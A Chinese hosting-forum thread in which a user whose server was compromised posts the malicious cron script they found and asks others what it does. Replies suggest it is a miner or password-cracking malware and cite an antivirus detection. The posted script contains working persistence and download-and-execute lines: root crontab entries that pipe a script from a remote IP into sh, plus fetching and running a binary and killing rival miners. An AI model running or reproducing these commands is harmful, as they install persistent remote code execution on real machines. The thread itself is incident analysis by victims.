找回密码
 立即注册
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
查看: 60|回复: 8

机器呗黑了,找到个定时任务,大佬看看是做啥的

[复制链接]

36

主题

145

回帖

514

积分

高级会员

积分
514
发表于 2018-5-8 09:39:48 | 显示全部楼层 |阅读模式
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddgs.3011" ]; then
    curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
回复

使用道具 举报

14

主题

172

回帖

518

积分

高级会员

积分
518
发表于 2018-5-8 09:44:53 | 显示全部楼层
ddgs.i686  主要是这个玩意不解密看不到 让我送他一波DDCC
回复

使用道具 举报

265

主题

432

回帖

2726

积分

金牌会员

积分
2726
发表于 2018-5-8 09:40:35 | 显示全部楼层
本帖最后由 ddnpc 于 2018-5-8 10:00 编辑

lastb last 看看 是不是被爆破了
更新
愚见:
不是挖矿的是破解密码的...



这个人还kill掉别人的挖矿脚本,真是“考虑周到”
密码库不错 收下了。
回复

使用道具 举报

20

主题

215

回帖

899

积分

高级会员

积分
899
发表于 2018-5-8 09:41:21 | 显示全部楼层
看不懂
回复

使用道具 举报

19

主题

62

回帖

293

积分

中级会员

积分
293
发表于 2018-5-8 09:41:55 | 显示全部楼层
http://www.361way.com/2t3ik-ddgs/5680.html
回复

使用道具 举报

3

主题

584

回帖

1912

积分

金牌会员

积分
1912
发表于 2018-5-8 09:45:32 | 显示全部楼层
这不是挖矿么?
回复

使用道具 举报

景生云 该用户已被删除
发表于 2018-5-8 09:45:54 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

90

主题

189

回帖

1196

积分

金牌会员

积分
1196
发表于 2018-5-8 09:46:19 | 显示全部楼层
卡巴斯基免费版

拒绝访问
无法访问该网页

对象网址:

http://165.225.157.157:8000/i.sh
原因: 对象被感染 HEUR:Trojan-Downloader.Shell.Agent.as
回复

使用道具 举报

288

主题

5428

回帖

1万

积分

论坛元老

积分
16563
发表于 2018-5-8 09:47:08 | 显示全部楼层

v2016 发表于 2018-5-8 09:40

那那个i.sh下载看看呢

i.sh就是我贴出来的全部内容,然后加到crontab了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|HS2V主机综合交流论坛

GMT+8, 2024-11-18 20:45 , Processed in 0.088256 second(s), 10 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表